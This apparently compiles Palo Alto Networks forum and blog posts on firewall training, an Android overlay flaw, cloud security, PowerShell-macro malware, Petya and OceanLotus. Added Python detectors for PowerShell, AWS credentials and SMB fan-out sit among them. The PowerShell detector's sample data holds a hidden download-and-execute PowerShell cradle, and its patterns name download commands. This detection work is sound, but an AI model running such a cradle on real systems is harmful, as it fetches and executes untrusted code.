Palo Alto Networks
I am an aspiring network engineer and I have seen many job listings that desire knowledge of Palo Alto technology. I plan to go thru the CBT Nuggets training for Palo Alto once I finish my network security class I’m currently enrolled in and I would like a VM or firewall appliance to lab and learn with. I’m wondering if you offer a LAB VM or device that I can use for educational purposes, and if so, what options are available and what are the costs. I have at my disposal an older Dell R410 server that I am currently running VMWare ESXi 6.7 on, along with my GNS3 lab environment.
Thank you for your time and any information you may provide.
Hey folks! Going through the Firewall 8.1 Essentials: Configuration and Management (EDU-210) next week in Boston and figured I'd pop on by here to see what's going on and noticed a LOT of great info from Louise a year ago, but have not seen anything since. I'm going to let folks know about Spiceworks next week (duh, of course I would) and point them in the direction of you folks. We'll have 16 people in class and should be pretty good, methinks.
Palo Alto Networks Unit 42 researchers are announcing details on a new high-severity vulnerability affecting the Google Android platform. Patches for this vulnerability are available as part of the September 2017 Android Security Bulletin. This new vulnerability does NOT affect Android 8.0 Oreo, the latest version; but it does affect all prior versions of Android. There is some malware that exploits some vectors outlined in this article, but Palo Alto Networks Unit 42 is not aware of any active attacks against this particular vulnerability at this time. Since Android 8.0 is a relatively recent release, this means that nearly all Android users should take action today and apply updates that are available to address this vulnerability.
What our researchers have found is a vulnerability that can be used to more easily enable an “overlay attack,” a type of attack that is already known on the Android platform. This type of attack is most likely to be used to get malicious software on the user’s Android device. This type of attack can also be used to give malicious software total control over the device. In a worst-case attack scenario, this vulnerability could be used to render the phone unusable (i.e., a “brick”) or to install any kind of malware including (but not limited to) ransomware or information stealers. In simplest terms, this vulnerability could be used to take control of devices, lock devices and steal information after it is attacked.
An “overlay attack” is an attack where an attacker’s app draws a window over (or “overlays”) other windows and apps running on the device. When done successfully, this can enable an attacker to convince the user he or she is clicking one window when, in fact, he or she is actually clicking another window. In Figure 1, you can see an example where an attacker is making it appear that the user is clicking to install a patch when in fact the user is clicking to grant the Porn Droid malware full administrator permissions on the device.
Figure 1: Bogus patch installer overlying malware requesting administrative permissions
You can see how this attack can be used to convince users to unwittingly install malware on the device. This can also be used to grant the malware full administrative privileges on the device.
An overlay attack can also be used to create a denial-of-service condition on the device by raising windows on the device that don’t go away. This is precisely the type of approach attackers use with ransomware attacks on mobile devices.
Of course, an overlay attack can be used to accomplish all three of these in a single attack:
- Trick a user into installing malware on their device.
- Trick a user into giving the malware full administrative privileges on the device.
- Use the overlay attack to lock up the device and hold it hostage for ransom.
Overlay attacks aren’t new; they’ve been discussed before. But until now, based on the latest research in the IEEE Security & Privacy paper, everyone has believed that malicious apps attempting to carry out overlay attacks must overcome two significant hurdles to be successful:
- They must explicitly request the “draw on top” permission from the user when installed.
- They must be installed from Google Play.
These are significant mitigating factors and so overlay attacks haven’t been reckoned a serious threat.
However, our new Unit 42 research shows that there is a way to carry out overlay attacks where these mitigating factors don’t apply. If a malicious app were to utilize this new vulnerability, our researchers have found it could carry out an overlay attack simply by being installed on the device. In particular, this means that malicious apps from websites and app stores other than Google Play can carry out overlay attacks. It’s important to note that apps from websites and app stores other than Google Play form a significant source of Android malware worldwide.
The particular vulnerability in question affects an Android feature known as “Toast.” “Toast” is a type of notification window that “pops” (like toast) on the screen. “Toast” is typically used to display messages and notifications over other apps.
Unlike other window types in Android, Toast doesn’t require the same permissions, and so the mitigating factors that applied to previous overlay attacks don’t apply here. Additionally, our researchers have outlined how it’s possible to create a Toast window that overlays the entire screen, so it’s possible to use Toast to create the functional equivalent of regular app windows.
In light of this latest research, the risk of overlay attacks takes on a greater significance. Fortunately, the latest version of Android is immune from these attacks “out of the box.” However, most people who run Android run versions that are vulnerable. This means that it’s critical for all Android users on versions before 8.0 to get updates for their devices. You can get information on patch and update availability from your mobile carrier or handset maker.
Of course, one of the best protections against malicious apps is to get your Android apps only from Google Play, as the Android Security Team aggressively screens against malicious apps and keeps them out of the store in the first place.
A data center is a fixed environment where applications run on dedicated servers that can only be accessed by authorized users. In contrast, a cloud environment is dynamic and automated, where pools of computing resources are available to support application workloads that can be accessed anywhere, anytime, from any device. For the experienced information security professional, it seems that many of the principles that make cloud computing attractive run counter to network security best practices. What follows are the top three considerations for securing traditional and cloud-based data centers, as well as key requirements for cloud security.
Cloud Computing Does Not Lessen Existing Network Security Risks
The security risks that threaten a data center and network today change once applications move to the cloud, whether in a complete migration or in a hybrid scenario in which some applications move to the cloud while others remain on premises. In fact, in several ways, the security risks faced when moving to the cloud become more significant.
For example, many data center applications use a wide range of ports, rendering traditional security measures ineffective when those applications are moved to the cloud. Cybercriminals are creating sophisticated port-agnostic attacks that use multiple vectors to compromise their target, hiding in plain sight using common applications to complete their mission.
Security Wants Separation and Segmentation - The Cloud Relies on Shared Resources
For decades, information security best practices dictated that mission-critical applications and data be separated into secure segments on the network. Often, this is referred to as Zero Trust: never trust, always verify.
On a physical network within the enterprise data center, Zero Trust is relatively straightforward to implement through the use of firewalls and VLANs (i.e., virtual LANs), managed by policies based on application and user identity.
In a cloud computing environment, direct communication between virtual machines within a server occurs constantly, in some cases across varied levels of trust. This makes segmentation a difficult task, especially given that cloud applications are based on the notion of shared resources. Mixed levels of trust, when combined with a lack of intra-host traffic visibility by virtualized port-based security offerings, will likely introduce a weakened security posture.
Security Configurations Are Process-Oriented | Cloud Computing Environments Are Dynamic
Virtual workloads can be created or modified in minutes. As such, cloud computing teams operate in a highly dynamic environment, with workloads being added, removed and changed constantly.
By contrast, the security configuration for this workload may take hours, days or weeks. Security delays are not designed to create roadblocks. Rather, they are the result of a process that is designed to maintain a strong security posture. Policy changes need to be approved, the appropriate firewalls need to be identified, and the relevant policy updates determined.
Unless this imbalance is understood and addressed as part of the cloud migration, the result is a discrepancy between security policy and cloud workload deployment. The result is a weakened security posture that can put important data and intellectual property in danger and might also cause violations of compliance and governance policies and regulations.
Key Requirements for Securing the Cloud
Consistent security in physical and virtualized form factors. The same levels of application control, rogue and misconfigured application handling, and threat prevention are needed to protect both the cloud computing environment and the physical network.
Segment business applications using Zero Trust principles. In order to fully maximize the use of computing resources, it is now a relatively common practice to mix application workload trust levels on the same compute resource. The goal is to control traffic between workloads while preventing the lateral movement of threats.
Centrally manage security deployments and streamline policy updates. Physical network security is still deployed in almost every organization, so it is critical to have the ability to manage both hardware and virtual form factor deployments from a centralized location using the same management infrastructure and interface. The selected solution must be capable of spanning physical and virtual environments through a consistent policy management and enforcement framework and should include features that automate security policy updates.
To learn more about securing traditional and cloud-based data centers with next-generation firewalls, read the whitepaper.
Recently, Unit42 has been investigating malware utilizing PowerShell and have spent a considerable amount of time refining ways to identify new variants of attacks as they appear. This posting is a follow-up of previous work on this subject in “Pulling Back the Curtains on EncodedCommand PowerShell Attacks”.
In a sample recently analyzed, something stood out as extremely suspicious which led us down a rabbit hole, uncovering malicious infrastructure supporting Chthonic, Nymaim, and other malware and malicious websites.
Throughout this blog post we present our analysis and thought process during this research, but if you would just like a list of the findings, they are over on our Unit42 GitHub.
One of those things is not like the others....
Most commonly, PowerShell is launched from a Microsoft Office document that uses a VBA macro to launch PowerShell to perform something malicious – typically downloading the “real” malware to run. We focused our investigation on the PowerShell activity with Palo Alto Networks AutoFocus to determine whether it’s worth digging into further based on “uniqueness” and functionality.
In this case, the first sample we looked at stood out for another reason entirely. If you take a look at the below PowerShell, you’ll quickly understand why.
This code downloads a file from the legitimate Notepad++ website. My initial thought was the worst-case scenario – they’ve been compromised and are distributing malware! I immediately downloaded the file from the website, but everything looked normal. Of course, I had to investigate further.
The sample stayed true to the previous outline I laid out for these attacks: the Microsoft Excel document appeared to be a lure about financial information, specifically a VAT invoice written in Polish as shown below.
Looking under the hood we see the VBA code that builds the PowerShell command and launches it but something seemed off. There are a ton of functions that are clearly decoding information from arrays after which it executes an already decoded PowerShell command. I decided to debug the macro and see exactly what it’s doing before I made any decisions.
If you look at the above image, there are five things to note.
1. The variable ‘horrorr’ (double ‘r’) is the result of all of the previously mentioned decoding functions. This builds a PowerShell command.
2. You can see ‘Shelleeeee horrorr, 0’ commented out; I believe this was intended to launch the previous PowerShell command.
3. The ‘Debug.Print horrorr’ prints the content of that variable in the ‘Immediate’ area shown in the screenshot. The domain in this command is NOT ‘notepad-plus-plus.org’ and can be seen below.
4. The ‘MsgBox’ will pop-up and not display anything, because the variable passed is ‘horror’ (1 ‘r’) along with the message ‘Do you really think I’m not a virus?’ in Polish.
5. The hard coded PowerShell command with ‘notepad-plus-plus.org’ will run.
The most likely conclusion that can be drawn here is that an analyst or researcher obtained this file, modified it to see the content (misspelling the variable name along the way) post-decoding, and uploaded it to see what it did in a sandbox. To be sure though, I needed to find other samples and see how they stacked up against this one.
Going back to the PowerShell command, the initial reason I stopped to look at it was due to the way they concatenated variables to form the download command and output. This also provides a perfect pivot point to hunt for samples. Using the below string to search Process Activity in AutoFocus revealed 171 samples.
The dates were all fairly recent, having been received in the past few days since the beginning of August. The documents shared the same themes for lures but the VBA macro and resulting PowerShell were more along the lines of what I expected.
For sample “538ff577a80748d87b5e738e95c8edd2bd54ea406fe3a75bf452714b17528a87” the following is an excerpt from the VBA macro building the PowerShell command.
We are limited on blog space here, but encourage you to go and read the full research on our Palo Alto Networks Research Center blog: https://researchcenter.paloaltonetworks.com/2017/08/unit42-the-curious-case-of-notepad-and-chthonic-...
Edited Aug 29, 2017 at 07:51 UTC
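The post's pivot was the way the macro concatenated string fragments to build its download command. As an added example (not code from the Unit 42 post or any Palo Alto Networks tooling), the Python below applies the same idea defensively to process command-line telemetry: it decodes `-EncodedCommand` payloads (base64 over UTF-16LE), re-joins `'a'+'b'` fragments so a split URL becomes visible, and flags download-cradle and hidden-window indicators. The sample command lines are constructed; the URL path and the use of notepad-plus-plus.org as a host are placeholders, not indicators from the research.

```python
"""Triage PowerShell process command lines for cradle/obfuscation indicators.

Added example for a SOC analyst; not Unit 42 code. Input is constructed.
"""
import base64
import re
from urllib.parse import urlparse

# -e / -ec / -enc / -encodedcommand followed by a base64 blob.
ENC_RE = re.compile(r"\s-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Adjacent single-quoted fragments joined with '+', e.g. 'http://'+'example'.
CONCAT_RE = re.compile(r"'\s*\+\s*'")
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
CRADLE_RE = re.compile(
    r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I
)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def make_encoded_command(script):
    """Wrap a script the way -EncodedCommand expects it: base64 over UTF-16LE."""
    blob = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    return "powershell.exe -nop -enc " + blob


# Constructed sample telemetry. The path '/EXAMPLE/file.exe' is a placeholder.
SAMPLE_CMDLINES = [
    # concatenated-string cradle in the spirit of the macro described in the post
    "powershell.exe -nop -w hidden -c \"$u='http://'+'notepad-plus-plus.org'+'/EXAMPLE/file.exe';"
    "$o=$env:TEMP+'\\tmp.exe';(New-Object Net.WebClient).DownloadFile($u,$o);Start-Process $o\"",
    # the same cradle hidden behind -EncodedCommand
    make_encoded_command(
        "$u='http://'+'notepad-plus-plus.org'+'/EXAMPLE/file.exe';"
        "(New-Object Net.WebClient).DownloadString($u)"
    ),
    # benign administrative use, should produce no indicators
    "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\inventory.ps1",
]


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Return indicators, contacted hosts and the de-obfuscated script for one command line."""
    indicators = []
    if ENC_RE.search(cmdline):
        indicators.append("encoded_command")
    if HIDDEN_RE.search(cmdline):
        indicators.append("hidden_window")
    # Work on what actually executes: the decoded payload when one is present.
    script = decode_encoded_command(cmdline) or cmdline
    if CONCAT_RE.search(script):
        indicators.append("string_concat")
    joined = CONCAT_RE.sub("", script)  # 'http://'+'host' -> 'http://host'
    if CRADLE_RE.search(joined):
        indicators.append("download_cradle")
    hosts = sorted({urlparse(u).hostname for u in URL_RE.findall(joined) if urlparse(u).hostname})
    return {"indicators": indicators, "hosts": hosts, "script": joined}


def triage_all(cmdlines):
    return [triage(c) for c in cmdlines]


if __name__ == "__main__":
    for result in triage_all(SAMPLE_CMDLINES):
        print(result["indicators"], result["hosts"])
```

Joining the fragments before extracting hosts is what makes the hunt pivot work: the host an analyst would want to cross-check against the legitimate site only appears once the pieces are reassembled, and the same logic runs unchanged on the decoded payload of an `-EncodedCommand` variant.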
The shift to the public cloud has offered organizations increased agility, flexibility and scalability. However, as more and more organizations move critical workloads to the public cloud, the potential for attackers to steal data, intellectual property or computing resources also rises.
Below is a brief breakdown of three considerations for securing public cloud workloads. Download the white paper to view the detailed list of all 10 top considerations.
Embrace the shared security model: The infrastructure is secured by the cloud service provider, but users are responsible for securing their own applications and data as it resides in the cloud. With this in mind, security practices must be implemented to secure workloads in the cloud as well as prevent loss of data and IP, just as if the workloads were on-premise.
Engage with business groups and DevOps early: Security teams and respective business groups, such as DevOps, should work collectively – particularly during initial stages of public cloud projects – to ensure all development needs are met while still maintaining a healthy security posture.
Know your potential exposure: Monitor public cloud usage, ensure proper configuration of the environment, enforce two-factor authentication, and properly lock down Secure Shell (SSH) access to gain visibility and minimize potential exposure through “shadow IT.”
Read the full list of our Top 10 Considerations for Securing Public Cloud Workloads.
GlobalProtect Clientless VPN is now GA in PAN-OS 8.0.4
One of the core preventive measures of our Next-Generation Security Platform comes from the role that the network plays in delivering protection. By placing security controls in the network, your organization can stop threats from reaching the user and control who has access to applications.
GlobalProtect Clientless VPN, initially released in beta in PAN-OS 8.0, is now GA with the release of PAN-OS 8.0.4. It allows organizations to deploy GlobalProtect to a broader set of user communities, providing access to applications in situations where the GlobalProtect app isn’t installed. Now users can access applications in the cloud or data center with virtually any current browser. This makes it possible to support application access on endpoints that may have locked down configurations (such as machines where users do not have admin rights) or hardened configurations like a kiosk.
The traffic for accessing the application passes through the next-generation firewall, allowing organizations to set up User-ID policies to control who can access the application, along with the content inspection capabilities for stopping threats in traffic. You can use file blocking policies to control file blocking functionality when accessing internal applications on non-trusted endpoints.
Clientless VPN allows users to access applications in the data center or the cloud. Traditionally, organizations tried to address various use cases with a mix of remote access VPN, cloud access products and network security appliances in a non-integrated manner. GlobalProtect takes the approach of delivering Clientless VPN through the Palo Alto Networks Next-Generation Security Platform, providing better security with a streamlined user experience.
Organizations have a variety of user populations, and many of them are not using corporate assets. The BYOD trend, for example, leads to use cases where employees own the device but use it with business applications. Contractors have similar needs; some may be using laptops managed by another organization, and some may not be managed at all. You can use Clientless VPN as a complement to your BYOD strategy to increase your options for supporting access on personally owned devices. For example, your organization may choose to support BYOD in two ways: for managed personally owned devices, use integration with MobileIron, AirWatch and Microsoft InTune to deploy the GlobalProtect app in Per-App VPN configurations. In scenarios where the GlobalProtect app cannot be used, provide access to applications using Clientless VPN.
If you want to learn more about these capabilities:
- Sign up for the upcoming “Addressing BYOD with new GlobalProtect features” webinar to get the technical details
- Watch this video to learn how the Clientless VPN works
- Review our Technical Documentation for Clientless VPN
Gartner’s 2017 Magic Quadrant for Enterprise Network Firewalls has been released, and Palo Alto Networks is proud to be positioned in the Leaders quadrant for the sixth consecutive year. I invite you to read the 2017 Magic Quadrant for Enterprise Network Firewalls report.
Gartner’s Magic Quadrant provides a graphical competitive positioning of technology providers in markets where growth is high and provider differentiation is distinct. Leaders execute well against their stated visions and are well-positioned for tomorrow. Gartner researchers continue to highlight both our ability to execute and the completeness of our vision. You can find more details in the report.
More than 39,500 customers in 140 countries have chosen Palo Alto Networks to realize the benefits of a truly next-generation security platform, safeguard critical assets, and prevent known and unknown threats. To protect our customers and stay ahead of sophisticated cyberattackers, we maintain a steadfast commitment to innovation. We recently introduced several more disruptive capabilities:
- Application Framework: With a SaaS-based consumption model, Palo Alto Networks Application Framework allows customers to use new apps to solve the most challenging security use cases with the best technology available, without the cost and operational burden of deploying new infrastructure.
- GlobalProtect cloud service: GlobalProtect cloud service eases your next-generation firewall and GlobalProtect deployment by leveraging cloud-based security infrastructure operated by Palo Alto Networks.
- Logging Service: Palo Alto Networks Logging Service is a cloud-based offering for context-rich, enhanced network logs generated by our security offerings, including those of our next-generation firewalls and GlobalProtect cloud service.
DISCLAIMER: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
In the last month, there have been several security news headlines highlighting incidents of accidental data exposure in the cloud. In some cases, portions of organizations’ most sensitive business and customer data were inadvertently exposed and left unprotected. That data loss could result in costly compliance violations and be detrimental to the business, especially if it were to find its way into the hands of a cybercriminal.
Accidental data exposure is risky. But as scary as the problem is, there are ways to ensure data loss prevention (DLP) in the cloud without sacrificing business productivity. Let’s explore the threat in a bit more detail and the steps you can take to protect yourself and your business.
Accidental Data Exposure – What’s So Risky?
Your users have good intentions (well, except for those malicious insiders). But they’re now used to an environment where they can access any application they want, from any device they want, from anywhere they choose, with little regard for the security risks involved. And with cloud and SaaS applications, which are specifically designed for easy sharing, the risk of data becoming unintentionally shared or exposed is often quite high. For example, an email with a shared link could be forwarded and eventually make its way outside of the organization. Similarly, the user sharing the file in the first place might accidentally click an incorrect email address when the application attempts to autocomplete. All you can do at that point is hope that the mistake doesn’t result in a security or compliance faux pas, or worse.
In addition, source code threats can be quite problematic. Engineers often hard-code user credentials into their API keys for third-party cloud services, such as Amazon Web Services (AWS), using source code, which is then uploaded into a web-based repository service, like GitHub. If leaked or breached, the source code provides an attacker with everything required to hack the AWS account, the API key and legitimate user credentials – all wrapped together with a neatly tied bow. Once inside, an attacker can mine for sensitive data with the intent to auction it off to the highest bitcoin bidder.
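The hard-coded-credential problem described above is one of the cases the "content matching" DLP tooling mentioned in this post is meant to catch before code leaves the organization. As an added example (not code from the post or from any Palo Alto Networks product), here is a small pre-commit style scanner in Python that looks for an AWS access key id (the `AKIA` + 16 character format) and a secret key sitting next to a `secret_access_key` assignment. The sample source files are constructed; the key values are the placeholder examples used in AWS documentation, not live credentials.

```python
"""Scan source text for hard-coded AWS credentials before it is pushed.

Added example of a DLP content-matching check; not vendor code. Sample
files below are constructed and use AWS's documented placeholder keys.
"""
import re

# Access key id: literal "AKIA" followed by 16 uppercase alphanumerics.
AKID_RE = re.compile(r"\b(AKIA[0-9A-Z]{16})\b")
# Secret access key: 40 base64-alphabet characters, only flagged when it
# follows an assignment that names a secret key, to limit false positives.
SECRET_RE = re.compile(r"(?:aws_?)?secret(?:_access)?_?key\W{0,5}([A-Za-z0-9/+=]{40})", re.I)

SAMPLE_FILES = {
    "deploy.py": (
        "import boto3\n"
        "client = boto3.client('s3', aws_access_key_id='AKIAIOSFODNN7EXAMPLE',\n"
        "    aws_secret_access_key='wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY')\n"
    ),
    # Reads the credential from the environment instead: the safe pattern.
    "config.py": "import os\nAWS_KEY = os.environ['AWS_ACCESS_KEY_ID']\n",
    # Mentions the variable name without a value: must not be flagged.
    "README.md": "Set AWS_SECRET_ACCESS_KEY in your shell before running.\n",
}


def redact(token):
    """Keep enough of the token to locate it in the file, never the whole value."""
    return token[:4] + "..." + token[-4:]


def scan_source(filename, text):
    """Return one finding per matched credential, with file, line, kind and redacted value."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in AKID_RE.finditer(line):
            findings.append({"file": filename, "line": lineno,
                             "kind": "aws_access_key_id", "value": redact(m.group(1))})
        for m in SECRET_RE.finditer(line):
            findings.append({"file": filename, "line": lineno,
                             "kind": "aws_secret_access_key", "value": redact(m.group(1))})
    return findings


def scan_files(files):
    """Scan a {filename: text} mapping, as a pre-commit hook would over staged files."""
    findings = []
    for name, text in files.items():
        findings.extend(scan_source(name, text))
    return findings


def is_clean(files):
    """Gate: True when nothing was found, i.e. the commit may proceed."""
    return not scan_files(files)


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['file']}:{f['line']} {f['kind']} {f['value']}")
    print("clean" if is_clean(SAMPLE_FILES) else "blocked")
```

Anchoring the secret-key pattern to the variable name rather than matching any 40-character token is the trade-off that keeps a hook like this usable on real repositories; the access key id has a fixed prefix and needs no such anchor.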
How Can You Protect Yourself and Your Business?
- Do a self-assessment.
- Get the right tools to ensure data loss prevention (e.g., app discovery, data classification and monitoring, content matching, machine learning).
- Implement an ongoing feedback loop.
Get your copy of the Comprehensive Data Security In The Cloud eGuide for more information on each of the steps listed above.
At Palo Alto Networks, we take a platform approach to addressing data loss prevention in the cloud. Rather than relying on disparate point products, our prevention-focused Next-Generation Security Platform extends and enforces existing enterprise security tools and policies across the cloud to mitigate risk and prevent inadvertent data loss and exposure.
Learn More: Comprehensive Data Security In The Cloud eGuide
WildFire cloud-based threat analysis service is the industry’s most advanced analysis and prevention engine for highly evasive zero-day exploits and malware. The cloud-based service employs a unique multi-technique approach combining dynamic and static analysis, innovative machine learning techniques, and a groundbreaking bare metal analysis environment to detect and prevent even the most evasive threats.
Find the Unknown With a Unique Multi-Technique Approach
WildFire goes beyond legacy approaches used to detect unknown threats, bringing together the benefits of four independent techniques for high-fidelity and evasion-resistant discovery, including:
- Dynamic analysis: Observes files as they detonate in a custom-built, evasion-resistant virtual environment, enabling detection of zero-day malware and exploits using hundreds of behavioral characteristics.
- Static analysis: Highly effective detection of malware and exploits that attempt to evade dynamic analysis, as well as instantly identifying variants of existing malware.
- Machine learning: Extracts thousands of unique features from each file, training a predictive machine learning classifier to identify new malware and exploits not possible with static or dynamic analysis alone.
- Bare metal analysis: Evasive threats are automatically sent to a real hardware environment for detonation, entirely removing an adversary’s ability to deploy anti-VM analysis techniques.
Together, these techniques allow WildFire to discover and automatically prevent unknown exploits and malware with high efficacy and near-zero false positives.
See how WildFire works together with the Palo Alto Networks Next-Generation Security Platform to automatically identify and prevent unknown attacks in 300 seconds, across the network, endpoint and cloud.
A data center houses an enterprise’s most critical data, such as source code, financial and personal information, or designs for pharmaceutical drugs – the enterprise’s digital crown jewels.
Designing and deploying a best practice security policy to protect your valuable data means protecting not only the perimeter of your enterprise network; it means protecting the connections into and out of the data center perimeter, as well as the connections between servers and VMs inside the data center.
But how do you transition to a data center best practice security policy?
In “Data Center Best Practice Security Policy Part 1: Concepts,” you’ll be presented with ways to think about a best practice security policy strategy and how to design it for your particular business, with the goal of achieving positive security enforcement that allows only the users, applications and content that you explicitly permit on the network, and denies all other traffic. It addresses questions such as:
- How do you create a transition strategy that aligns with your business goals?
- How do you decide which assets to protect first?
- What methods should you use to make the transition?
- How will you protect your data center during the transition?
If you enjoyed part 1, look for “Data Center Best Practice Security Policy Part 2: Implementation” to learn the specific best practices to apply to traffic at the perimeter and inside the data center.
This Unit 42 blog provides an update on the threat situation surrounding attacks using the Petya Ransomware which are impacting organizations in Ukraine and other parts of Europe.
On June 27th, 2017 we became aware of a new variant of the Petya malware which is spreading over the Microsoft Windows SMB protocol. The malware appears to use the ETERNALBLUE exploit tool to accomplish this. This is the same exploit the WanaCrypt0r/WanaCry malware exploited to spread globally in May, 2017. Multiple organizations have reported network outages, including government and critical infrastructure operators.
Palo Alto Networks is documenting our prevention capabilities with regard to this threat in the Palo Alto Networks Protections for Petya Ransomware blog post. Windows users should take the following general steps to protect themselves:
- Apply security updates in MS17-010
- Block inbound connections on TCP Port 445
- Create and maintain good back-ups so that if an infection occurs, you can restore your data.
This is a developing situation, we will update this blog as new information becomes available. AutoFocus users view samples using the Petya tag.
Get the full insight on Petya Ransomware in our developing Threat Brief here: https://researchcenter.paloaltonetworks.com/2017/06/unit42-threat-brief-petya-ransomware/
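The three steps above are preventive. On the detection side, a network that spreads over SMB the way this post describes leaves a recognisable pattern in connection logs: one source opening TCP 445 to many distinct internal hosts in a short window, and, where the port-445 block is missing, SMB allowed in from outside the organisation's address space. As an added example (not from the Unit 42 post or any Palo Alto Networks product), the Python below checks for both over constructed firewall log lines. The `key=value` log format and the RFC 1918 internal ranges are assumptions for the example; adapt them to the real log source and address plan.

```python
"""Detect SMB (TCP 445) fan-out and externally sourced SMB in connection logs.

Added example for a SOC team; not vendor code. Log format and address
plan are assumptions, and every log line below is constructed.
"""
import re
from datetime import datetime
from ipaddress import ip_address, ip_network

LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) "
    r"proto=(?P<proto>\w+) action=(?P<action>\w+)$"
)
# Assumed internal address plan: RFC 1918 space. 203.0.113.0/24 (TEST-NET-3)
# plays the role of an Internet source in the sample.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]

SAMPLE_LOG = """\
2017-06-27T10:15:00Z src=10.0.5.12 dst=10.0.5.20 dport=445 proto=tcp action=allow
2017-06-27T10:15:01Z src=10.0.5.12 dst=10.0.5.21 dport=445 proto=tcp action=allow
2017-06-27T10:15:02Z src=10.0.5.12 dst=10.0.5.22 dport=445 proto=tcp action=allow
2017-06-27T10:15:03Z src=10.0.5.12 dst=10.0.5.23 dport=445 proto=tcp action=allow
2017-06-27T10:15:04Z src=10.0.5.12 dst=10.0.5.24 dport=445 proto=tcp action=allow
2017-06-27T10:15:05Z src=10.0.5.12 dst=10.0.5.25 dport=445 proto=tcp action=allow
2017-06-27T10:15:06Z src=10.0.5.30 dst=10.0.5.40 dport=445 proto=tcp action=allow
2017-06-27T10:15:07Z src=10.0.5.30 dst=10.0.5.40 dport=445 proto=tcp action=allow
2017-06-27T10:15:08Z src=203.0.113.7 dst=10.0.5.20 dport=445 proto=tcp action=allow
2017-06-27T10:15:09Z src=10.0.5.12 dst=10.0.5.50 dport=443 proto=tcp action=allow
"""


def parse_log(text):
    """Parse key=value lines into event dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        e["dport"] = int(e["dport"])
        events.append(e)
    return events


def is_internal(ip):
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def external_smb_allowed(events):
    """Allowed SMB connections whose source is outside the internal ranges:
    evidence that the 'block inbound 445' control is not in place."""
    return [e for e in events
            if e["dport"] == 445 and e["action"] == "allow" and not is_internal(e["src"])]


def smb_fanout(events, window_seconds=60, threshold=5):
    """Sources that reached at least `threshold` distinct hosts on 445 within one window.
    Returns {src: max_distinct_destinations}."""
    by_src = {}
    for e in events:
        if e["dport"] == 445 and e["action"] == "allow":
            by_src.setdefault(e["src"], []).append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        best = 0
        for i, start in enumerate(evs):
            in_window = [e for e in evs[i:] if (e["ts"] - start["ts"]).total_seconds() <= window_seconds]
            best = max(best, len({e["dst"] for e in in_window}))
        if best >= threshold:
            alerts[src] = best
    return alerts


if __name__ == "__main__":
    ev = parse_log(SAMPLE_LOG)
    print("fan-out:", smb_fanout(ev))
    print("external SMB allowed:", [(e["src"], e["dst"]) for e in external_smb_allowed(ev)])
```

The threshold and window need tuning per environment: a file server or a vulnerability scanner will legitimately touch many hosts on 445, so the usual approach is to allow-list those sources rather than raise the threshold for everyone.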
Cloud-based logging service to enable innovative security applications
Adversaries constantly change tactics making it harder to detect attacks. Therefore, to surface evasive threats and prevent attacks, organizations must be able to perform advanced analytics on all the available data. Security applications that perform such analytics need access to scalable storage capacity and processing power.
Palo Alto Networks Logging Service is a cloud-based offering for context-rich enhanced network logs generated by our security offerings including those of our Next-Generation Firewalls and GlobalProtect cloud service. The cloud-based nature of the Logging Service allows customers to collect ever expanding rates of data, without needing to plan for local compute and storage.
Logging Service is the cornerstone of Palo Alto Networks application framework, which provides a scalable ecosystem of security applications that can apply advanced analytics in concert with Palo Alto Networks enforcement points to prevent the most advanced attacks. You are no longer limited by how much hardware is available nor by how quickly the sensors can be deployed.
- Leverages powerful, elastic cloud-based computing to provide analytics and insights on large amounts of data.
- Simplifies operations by eliminating activities required to operationalize logging capacity.
- Increases agility by allowing you to become more responsive to your changing business needs.
Recently, we discovered a new version of the OceanLotus backdoor in our WildFire cloud analysis platform which may be one of the more advanced backdoors we have seen on macOS to date. This iteration is targeted towards victims in Vietnam and still maintains extremely low AV detection almost a year after it was first discovered. Despite having been in the wild for an extended period of time, the operation appears to still be active. During our analysis, we were able to communicate directly with the command and control server as recently as early June 2017.
While there seem to be similarities to an OceanLotus sample discovered in May 2015, a variety of improvements have been made since then. Some of the improvements include the use of a decoy document, elimination of the use of command line utilities, a robust string encoding mechanism, custom binary protocol traffic with encryption, and a modularized backdoor.
Infection Vector
The new OceanLotus backdoor is distributed in a zip file. While we don't have direct evidence of the initial infection vector, we presume it is most likely an email attachment. Once the user extracts the zip file, they see a directory containing a file with a Microsoft Word document icon. The file is actually an application bundle containing executable code (see Figure 1). When the user double-clicks the purported Word document, the Trojan executes and then launches Word to display a decoy document.
The malware uses the decoy document to help mask its own execution. This technique is common in Windows-based malware but rare on macOS. To achieve this layer of obfuscation, the malware author had to trick the operating system into treating the folder as an application bundle despite its .docx extension. Traditionally, macOS malware has emulated legitimate application installers such as Adobe Flash, which is how the previous version of OceanLotus was packaged.
Figure 1. Context menu and file listing
